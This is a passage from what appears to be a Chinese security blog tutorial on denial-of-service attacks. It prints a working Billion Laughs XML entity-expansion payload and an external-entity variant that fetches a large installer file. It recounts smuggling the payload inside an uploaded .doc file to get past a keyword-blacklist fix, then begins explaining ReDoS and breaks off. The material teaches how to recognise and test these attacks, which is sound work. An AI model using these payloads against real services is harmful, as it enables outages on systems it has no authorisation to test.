                          \u636e\u8bf4\u8fd9\u88ab\u79f0\u4e3a\u5341\u4ebf\u5927\u7b11DoS\u653b\u51fb<\/strong>\uff0c\u5176\u6587\u4ef6\u5185\u5bb9\u4e3a\uff1a<\/p>\n\n
                          <!DOCTYPE keyz [\n  <!ENTITY key \"key\">\n  <!ENTITY key2 \"&key;&key;&key;&key;&key;&key;&key;&key;&key;&key;\">\n  <!ENTITY key3 \"&key2;&key2;&key2;&key2;&key2;&key2;&key2;&key2;&key2;&key2;\">\n  <!ENTITY key4 \"&key3;&key3;&key3;&key3;&key3;&key3;&key3;&key3;&key3;&key3;\">\n  <!ENTITY key5 \"&key4;&key4;&key4;&key4;&key4;&key4;&key4;&key4;&key4;&key4;\">\n  <!ENTITY key6 \"&key5;&key5;&key5;&key5;&key5;&key5;&key5;&key5;&key5;&key5;\">\n  <!ENTITY key7 \"&key6;&key6;&key6;&key6;&key6;&key6;&key6;&key6;&key6;&key6;\">\n  <!ENTITY key8 \"&key7;&key7;&key7;&key7;&key7;&key7;&key7;&key7;&key7;&key7;\">\n  <!ENTITY key9 \"&key8;&key8;&key8;&key8;&key8;&key8;&key8;&key8;&key8;&key8;\">\n]>\n<keyz>&key9;<\/keyz>\n<\/code><\/pre>\n\n
                          \u8fd9\u662f\u4e00\u6bb5\u5b9e\u4f53\u5b9a\u4e49\uff0c\u4ece\u4e0b\u5411\u4e0a\u89c2\u5bdf\u7b2c\u4e00\u5c42\u53d1\u73b0key9<\/code>\u753110\u4e2akey8<\/code>\u7ec4\u6210\uff0c\u7531\u6b64\u7c7b\u63a8\u5f97\u51fakey[n]<\/code>\u753110\u4e2akey[n-1]<\/code>\u7ec4\u6210\uff0c\u90a3\u4e48\u6700\u7ec8\u7b97\u4e0b\u6765\u5b9e\u9645\u4e0akey9<\/code>\u753110^9<\/code>(1000000000)\u4e2akey[..]<\/code>\u7ec4\u6210\uff0c\u4e5f\u7b97\u662f\u540d\u526f\u5176\u5b9e\u4e86\uff5e<\/p>\n\n
                          \u672c\u5730\u6d4b\u8bd5\u89e3\u6790\u8be5XML\u6587\u6863\uff0c\u5927\u6982\u5360\u7528\u5185\u5b58\u57282.5GB\u5de6\u53f3\uff08\u5176\u4ed6\u6587\u7ae0\u4e2d\u51fa\u73b0\u7684\u5747\u4e3a3GB\u5de6\u53f3\u5185\u5b58\uff09\uff1a<\/p>\n\n
                          \"-w607\"<\/p>\n\n
                          \u8bd5\u60f3\uff1a\u8fd9\u53ea\u662f9\u5c42\u7ea7\u70b8\u5f39\uff0c\u5982\u679c\u518d\u591a\u4e00\u70b9\u5462\uff1f<\/strong><\/p>\n\n
                          External Entity<\/h4>\n\n
                          \u5916\u90e8\u5b9e\u4f53\u5f15\u7528\uff0c\u6587\u6863\u5185\u5bb9\u5982\u4e0b\uff1a<\/p>\n\n
                          <!DOCTYPE keyz [\n    <!ENTITY wechat SYSTEM \"https:\/\/dldir1.qq.com\/weixin\/Windows\/WeChatSetup.exe\">\n]>\n<keyz>&wechat;<\/keyz>\n<\/code><\/pre>\n\n
                          \u8fd9\u4e2a\u7406\u89e3\u8d77\u6765\u5c31\u5f88\u7b80\u5355\u4e86\uff0c\u5c31\u662f\u4ece\u5916\u90e8\u7684\u94fe\u63a5\u4e2d\u53bb\u83b7\u53d6\u89e3\u6790\u5b9e\u4f53\uff0c\u800c\u6211\u4eec\u53ef\u4ee5\u8bbe\u7f6e\u8fd9\u4e2a\u89e3\u6790URL\u4e3a\u4e00\u4e2a\u8d85\u5927\u6587\u4ef6\u7684\u4e0b\u8f7d\u5730\u5740\uff0c\u4ee5\u4e0a\u6240\u4e3e\u4f8b\u5c31\u662f\u5fae\u4fe1\u7684\u3002<\/p>\n\n
                          \"-w370\"<\/p>\n\n
                          \u5f53\u7136\uff0c\u6211\u4eec\u4e5f\u53ef\u4ee5\u8bbe\u7f6e\u4e00\u4e2a\u4e0d\u8fd4\u56de\u7ed3\u679c\u7684\u5730\u5740\uff0c\u5982\u679c\u5916\u90e8\u5730\u5740\u4e0d\u8fd4\u56de\u7ed3\u679c\uff0c\u90a3\u4e48\u8fd9\u4e2a\u89e3\u6790\u5c31\u4f1a\u5728\u6b64\u5904\u4e00\u76f4\u6302\u8d77\u4ece\u800c\u5360\u7528\u5185\u5b58\u3002<\/p>\n\n
                          Internal Entity<\/h4>\n\n
                          \u5185\u90e8\u5b9e\u4f53\u5f15\u7528\uff0c\u6587\u6863\u5185\u5bb9\u5982\u4e0b\uff1a<\/p>\n\n
                          <!DOCTYPE keyz [\n  <!ENTITY a \"a...a\">\n]>\n<keyz>&a;...&a;<\/keyz>\n<\/code><\/pre>\n\n
                          \u5176\u610f\u601d\u5c31\u662f\u5b9e\u4f53a<\/code>\u7684\u5185\u5bb9\u53c8\u81ed\u53c8\u957f\uff0c\u800c\u540e\u53c8N\u6b21\u5f15\u7528\u8fd9\u4e2a\u5b9e\u4f53\u5185\u5bb9\uff0c\u8fd9\u5c31\u4f1a\u9020\u6210\u89e3\u6790\u7684\u65f6\u5019\u5360\u7528\u5927\u91cf\u8d44\u6e90\u3002<\/p>\n\n
                          \u5b9e\u9645\u573a\u666f<\/h4>\n\n
                          \"-w455\"<\/p>\n\n
                          \u4e00\u5f00\u59cb\u901a\u8fc7\u6b64\u5904\u4e0a\u4f20doc<\/code>\u6587\u6863\u7684\u529f\u80fd\uff0c\u53d1\u73b0\u4e86\u4e00\u679aXXE\u6ce8\u5165<\/code>\uff0c\u63d0\u4ea4\u540e\u5382\u5546\u8fdb\u884c\u4fee\u590d\uff0c\u4f46\u590d\u6d4b\u540e\u53d1\u73b0\u5176\u4fee\u590d\u7684\u7ed3\u679c\u5c31\u662f\u9ed1\u540d\u5355SYSTEM<\/code>\u5173\u952e\u8bcd\uff0c\u6ca1\u529e\u6cd5\u901a\u8fc7\u5e26\u5916\u901a\u9053\u8bfb\u53d6\u654f\u611f\u6570\u636e\u4e86\uff5e<\/p>\n\n
                          \u62b1\u7740\u8bd5\u4e00\u8bd5\u7684\u5fc3\u6001\u5c06Billion Laughs<\/code>\u7684Payload<\/code>\u653e\u5165\u5230doc<\/code>\u6587\u6863\u4e2d(\u8fd9\u91cc\u4e0eXXE doc\u6587\u6863<\/code>\u5236\u4f5c\u65b9\u5f0f\u4e00\u6837\u4fee\u6539[Content_Types].xml<\/code>\u6587\u4ef6\uff0c\u91cd\u65b0\u6253\u5305\u5373\u53ef)\uff1a<\/p>\n\n
                          \"-w1274\"<\/p>\n\n
                          \u4e0a\u4f20\u4e4b\u540e\u4ea7\u751f\u7684\u6548\u679c\u5c31\u662f\u7f51\u7ad9\u5ef6\u65f6\u6781\u9ad8\uff0c\u81f3\u6b64\u5c31\u5b8c\u6210\u4e86\u6574\u4e2a\u6d4b\u8bd5\u3002<\/p>\n\n
                          ReDoS(\u6b63\u5219\u8868\u8fbe\u5f0f\u62d2\u7edd\u670d\u52a1\u653b\u51fb)<\/h3>\n\n
                          ReDoS\uff0c\u6b63\u5219\u8868\u8fbe\u5f0f\u62d2\u7edd\u670d\u52a1\u653b\u51fb\uff0c\u987e\u540d\u601d\u4e49\uff0c\u5c31\u662f\u7531\u6b63\u5219\u8868\u8fbe\u5f0f\u9020\u6210\u7684\u62d2\u7edd\u670d\u52a1\u653b\u51fb\uff0c\u5f53\u7f16\u5199\u6821\u9a8c\u7684\u6b63\u5219\u8868\u8fbe\u5f0f\u5b58\u5728\u7f3a\u9677\u6216\u8005\u4e0d\u4e25\u8c28\u65f6\uff0c\u653b\u51fb\u8005\u53ef\u4ee5\u6784\u9020\u7279\u6b8a\u7684\u5b57\u7b26\u4e32\u6765\u5927\u91cf\u6d88\u8017\u670d\u52a1\u5668\u7684\u7cfb\u7edf\u8d44\u6e90\uff0c\u9020\u6210\u670d\u52a1\u5668\u7684\u670d\u52a1\u4e2d\u65ad\u6216\u505c\u6b62\u3002<\/p>\n\n
                          \u5728\u6b63\u5f0f\u4e86\u89e3ReDoS\u4e4b\u524d\uff0c\u6211\u4eec\u9700\u8981\u5148\u4e86\u89e3\u4e00\u4e0b\u6b63\u5219\u8868\u8fbe\u5f0f\u7684\u4e24\u7c7b\u5f15\u64ce\uff1a<\/p>\n\n\n  \n    \n      \n    \n      \n      
                          \u540d\u79f0<\/th>\n      \u533a\u522b<\/th>\n      \u5e94\u7528<\/th>\n      \u5339\u914d\u65b9\u5f0f<\/th>\n    <\/tr>\n  <\/thead>\n  
                          DFA<\/td>\n      DFA\u5bf9\u4e8e\u6587\u672c\u4e32\u91cc\u7684\u6bcf\u4e00\u4e2a\u5b57\u7b26\u53ea\u9700\u626b\u63cf\u4e00\u6b21\uff0c\u901f\u5ea6\u5feb\u3001\u7279\u6027\u5c11<\/td>\n      awk(\u5927\u591a\u6570\u7248\u672c)\u3001egrep\uff08\u5927\u591a\u6570\u7248\u672c\uff09\u3001flex\u3001lex\u3001MySQL\u3001Procmail\u2026<\/td>\n      \u6587\u672c\u6bd4\u8f83\u6b63\u5219<\/td>\n    <\/tr>\n    
                          NFA<\/td>\n      NFA\u8981\u7ffb\u6765\u8986\u53bb\u6807\u6ce8\u5b57\u7b26\u3001\u53d6\u6d88\u6807\u6ce8\u5b57\u7b26\uff0c\u901f\u5ea6\u6162\uff0c\u4f46\u662f\u7279\u6027(\u5982:\u5206\u7ec4\u3001\u66ff\u6362\u3001\u5206\u5272)\u4e30\u5bcc<\/td>\n      GNU Emacs\u3001Java\u3001grep\uff08\u5927\u591a\u6570\u7248\u672c\uff09\u3001less\u3001more\u3001.NET\u8bed\u8a00\u3001PCRE library\u3001Perl\u3001PHP\uff08\u6240\u6709\u4e09\u5957\u6b63\u5219\u5e93\uff09\u3001Python\u3001Ruby\u3001set\uff08\u5927\u591a\u6570\u7248\u672c\uff09\u3001vi\u2026<\/td>\n      \u6b63\u5219\u6bd4\u8f83\u6587\u672c<\/td>\n    <\/tr>\n  <\/tbody>\n<\/table>\n\n
                          \u6587\u672c\u6bd4\u8f83\u6b63\u5219\uff1a\u770b\u5230\u4e00\u4e2a\u5b50\u6b63\u5219\uff0c\u5c31\u628a\u53ef\u80fd\u5339\u914d\u7684\u6587\u672c\u5168\u6807\u6ce8\u51fa\u6765\uff0c\u7136\u540e\u518d\u770b\u6b63\u5219\u7684\u4e0b\u4e00\u4e2a\u90e8\u5206\uff0c\u6839\u636e\u65b0\u7684\u5339\u914d\u7ed3\u679c\u66f4\u65b0\u6807\u6ce8\u3002<\/p>\n\n
                          \u6b63\u5219\u6bd4\u8f83\u6587\u672c\uff1a\u770b\u89c1\u4e00\u4e2a\u5b57\u7b26\uff0c\u5c31\u628a\u5b83\u8ddf\u6b63\u5219\u6bd4\u8f83\uff0c\u5339\u914d\u5c31\u6807\u6ce8\u4e0b\u6765\uff0c\u7136\u540e\u63a5\u7740\u5f80\u4e0b\u5339\u914d\u3002\u4e00\u65e6\u4e0d\u5339\u914d\uff0c\u5c31\u5ffd\u7565\u8fd9\u4e2a\u5b57\u7b26\uff0c\u4ee5\u6b64\u7c7b\u63a8\uff0c\u76f4\u5230\u56de\u5230\u4e0a\u4e00\u6b21\u6807\u6ce8\u5339\u914d\u7684\u5730\u65b9\u3002<\/p>\n\n
                          \u90a3\u4e48\u5b58\u5728ReDoS\u7684\u6838\u5fc3\u5c31\u662fNFA\u6b63\u5219\u8868\u8fbe\u5f0f\u5f15\u64ce<\/strong>\uff0c\u5b83\u7684\u591a\u6a21\u5f0f\u4f1a\u8ba9\u81ea\u8eab\u9677\u5165\u9012\u5f52\u9669\u5883\uff0c\u4ece\u800c\u5bfc\u81f4\u5360\u7528\u5927\u91cfCPU\u8d44\u6e90\uff0c\u6027\u80fd\u6781\u5dee\uff0c\u4e25\u91cd\u5219\u5bfc\u81f4\u62d2\u7edd\u670d\u52a1\u3002<\/p>\n\n
                          NFA \u56de\u6eaf<\/h4>\n\n
                          \u7b80\u5355\u7684\u804a\u4e00\u4e0b\u4ec0\u4e48\u662f\u56de\u6eaf\uff0c\u8fd9\u91cc\u6709\u4e00\u4e2a\u6b63\u5219\u8868\u8fbe\u5f0f\uff1a<\/p>\n\n
                          ke{1,3}y \n<\/code><\/pre>\n\n
                          \u5176\u610f\u56fe\u5f88\u7b80\u5355\uff0ce<\/code>\u5b57\u7b26\u9700\u8981\u5339\u914d1-3\u6b21\uff0ck<\/code>\u3001y<\/code>\u5339\u914d\u4e00\u6b21\u5373\u53ef\u3002<\/p>\n\n
                          \u73b0\u5728\u6211\u4eec\u9047\u5230\u4e86\u4e24\u4e2a\u9700\u8981\u5339\u914d\u7684\u5b57\u7b26\u4e32\uff1a<\/p>\n\n